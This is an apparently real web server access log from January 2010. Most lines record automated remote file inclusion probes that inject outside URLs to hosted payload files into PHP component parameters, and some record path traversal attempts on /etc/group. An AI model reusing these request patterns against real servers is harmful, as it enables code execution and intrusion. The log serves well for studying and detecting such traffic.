209.59.12.99 - - [04/Jan/2010:00:57:22 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.122.19.24 - - [04/Jan/2010:00:57:42 -0500] "GET //index.php?abs_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.92.156.53 - - [04/Jan/2010:00:57:42 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.92.156.53 - - [04/Jan/2010:00:57:42 -0500] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.92.156.53 - - [04/Jan/2010:00:57:42 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:58:02 -0500] "GET /?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:58:02 -0500] "GET /logs/access_log.Q109072900/?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:58:02 -0500] "GET /logs/?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:00:58:02 -0500] "GET /logs/access_log.Q109090900/?DOCUMENT_ROOT=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Jan/2010:00:59:26 -0500] "GET /logs/access_log.Q109101500//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
64.151.247.1 - - [04/Jan/2010:01:00:03 -0500] "GET /logs/access_log.Q109051800%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
64.151.247.1 - - [04/Jan/2010:01:00:03 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
64.151.247.1 - - [04/Jan/2010:01:00:03 -0500] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
83.170.89.6 - - [04/Jan/2010:01:00:59 -0500] "GET //components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
83.170.89.6 - - [04/Jan/2010:01:00:59 -0500] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
83.170.89.6 - - [04/Jan/2010:01:00:59 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
209.92.156.53 - - [04/Jan/2010:01:01:45 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.92.156.53 - - [04/Jan/2010:01:01:45 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.151.247.1 - - [04/Jan/2010:01:01:49 -0500] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
64.151.247.1 - - [04/Jan/2010:01:01:49 -0500] "GET /logs/access_log.Q109082800//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
209.92.156.53 - - [04/Jan/2010:01:02:05 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.92.156.53 - - [04/Jan/2010:01:02:05 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jan/2010:01:02:22 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [04/Jan/2010:01:02:31 -0500] "GET /logs/error_log.Q109101900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
83.170.89.6 - - [04/Jan/2010:01:04:14 -0500] "GET /logs/access_log.Q109051800%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
81.2.201.96 - - [04/Jan/2010:01:05:50 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:05:50 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.195.114.54 - - [04/Jan/2010:01:05:48 -0500] "GET /logs/error_log.Q109071400 HTTP/1.0" 200 3225177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.2.201.96 - - [04/Jan/2010:01:05:54 -0500] "GET /logs/access_log.Q109052900//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:05:54 -0500] "GET /logs/access_log.Q109072400//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:05:55 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:05:55 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:05:55 -0500] "GET /logs/access_log.Q109052900//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:05:55 -0500] "GET /logs/access_log.Q109072400//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.65.49 - - [04/Jan/2010:01:06:02 -0500] "GET /images/Office%20Supply/logo_7.gif HTTP/1.1" 200 781 "-" "Googlebot-Image/1.0"
67.195.114.54 - - [04/Jan/2010:01:05:51 -0500] "GET /logs/error_log.Q109071400 HTTP/1.0" 200 3225177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
60.251.165.181 - - [04/Jan/2010:01:07:05 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:07 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:07 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:07 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:11 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:11 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:17 -0500] "GET /logs//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:17 -0500] "GET //login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:17 -0500] "GET /logs/access_log.Q109102400//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jan/2010:01:07:22 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.92.156.53 - - [04/Jan/2010:01:07:22 -0500] "GET /logs/access_log.Q109101500//accounts/inc/include.php?language=0&lang_settings[0][1]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:45 -0500] "GET /logs/access_log.Q109121000//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
60.251.165.181 - - [04/Jan/2010:01:07:50 -0500] "GET /logs/access_log.Q109121000//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.92.156.53 - - [04/Jan/2010:01:07:52 -0500] "GET /logs/access_log.Q109101500//accounts/inc/include.php?language=0&lang_settings[0][1]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:55 -0500] "GET //skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:55 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:55 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:56 -0500] "GET //skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:56 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:56 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:07:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.19.116.18 - - [04/Jan/2010:01:09:06 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.116.18 - - [04/Jan/2010:01:09:06 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.116.18 - - [04/Jan/2010:01:09:06 -0500] "GET /logs/access_log.Q109091700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.206.112.101 - - [04/Jan/2010:01:09:16 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.206.112.101 - - [04/Jan/2010:01:09:21 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.206.112.101 - - [04/Jan/2010:01:09:21 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.206.112.101 - - [04/Jan/2010:01:09:53 -0500] "GET /logs/access_log.Q109121000//components/com_simpleboard/image_upload.php?sbp=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:10:30 -0500] "GET /logs/access_log.Q109052900%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:10:30 -0500] "GET /logs/access_log.Q109072400%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:10:45 -0500] "GET /logs/access_log.Q109052900%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:10:45 -0500] "GET /logs/access_log.Q109072400%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:48 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:48 -0500] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:48 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:49 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:49 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:49 -0500] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:50 -0500] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:50 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:10:51 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:11:00 -0500] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:11:00 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 32774 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:11:00 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs/access_log.Q109091500%20%20//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs/access_log.Q109091500%20%20//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:07 -0500] "GET /logs/access_log.Q109091500//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:08 -0500] "GET /logs/access_log.Q109091500//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
95.108.128.242 - - [04/Jan/2010:01:11:13 -0500] "GET /logs/access_log.Q109062900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
81.2.201.96 - - [04/Jan/2010:01:11:14 -0500] "GET /logs/access_log.Q109083000//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:15 -0500] "GET /logs/access_log.Q109083000%20%20//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:16 -0500] "GET /logs/access_log.Q109083000%20%20//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:11:17 -0500] "GET /logs/access_log.Q109083000//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:11:46 -0500] "GET //login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:11:46 -0500] "GET /logs/access_log.Q109102400//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:11:46 -0500] "GET /logs//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.19.116.18 - - [04/Jan/2010:01:12:41 -0500] "GET /logs/access_log.Q109091700%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:12:49 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:12:49 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:12:49 -0500] "GET /logs/access_log.Q109101400//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:12:49 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:12:49 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:12:49 -0500] "GET /logs/access_log.Q109101400//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:13:00 -0500] "GET /logs/access_log.Q109091500//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:13:02 -0500] "GET /logs/access_log.Q109091500//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:13:04 -0500] "GET //stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:13:04 -0500] "GET /logs/access_log.Q109101500//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:13:04 -0500] "GET /logs//stubjambo.php?baseDir=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
74.53.110.2 - - [04/Jan/2010:01:14:30 -0500] "GET /logs/error_log.Q109112200//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 262 "-" "-"
74.53.110.2 - - [04/Jan/2010:01:14:30 -0500] "GET /logs/error_log.Q109112200//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 262 "-" "-"
74.53.110.2 - - [04/Jan/2010:01:14:39 -0500] "GET /logs/access_log.Q109120800//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 263 "-" "-"
74.53.110.2 - - [04/Jan/2010:01:14:39 -0500] "GET /logs/access_log.Q109120800//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 263 "-" "-"
81.26.211.175 - - [04/Jan/2010:01:16:59 -0500] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.26.211.175 - - [04/Jan/2010:01:16:59 -0500] "GET /logs/error_log.Q109121900%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.26.211.175 - - [04/Jan/2010:01:16:59 -0500] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.26.211.175 - - [04/Jan/2010:01:17:02 -0500] "GET /logs/error_log.Q109120500%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [04/Jan/2010:01:19:31 -0500] "GET //?s=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
210.205.6.233 - - [04/Jan/2010:01:19:31 -0500] "GET /logs//?s=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 200 32779 "-" "Mozilla/5.0"
95.108.128.242 - - [04/Jan/2010:01:19:55 -0500] "GET /logs/access_log.Q109082700 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
61.47.7.71 - - [04/Jan/2010:01:20:13 -0500] "GET /logs/access_log.Q109102400%20%20//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:20:46 -0500] "GET /logs/access_log.Q109102400%20%20//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [04/Jan/2010:01:21:20 -0500] "GET /logs/access_log.Q109101500//index.php?_REQUEST=&_REQUEST[option]=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:21:30 -0500] "GET /logs/access_log.Q109122500%20%20//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [04/Jan/2010:01:21:57 -0500] "GET /logs/access_log.Q109122500%20%20//login.php?dir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.255.32.182 - - [04/Jan/2010:01:23:58 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
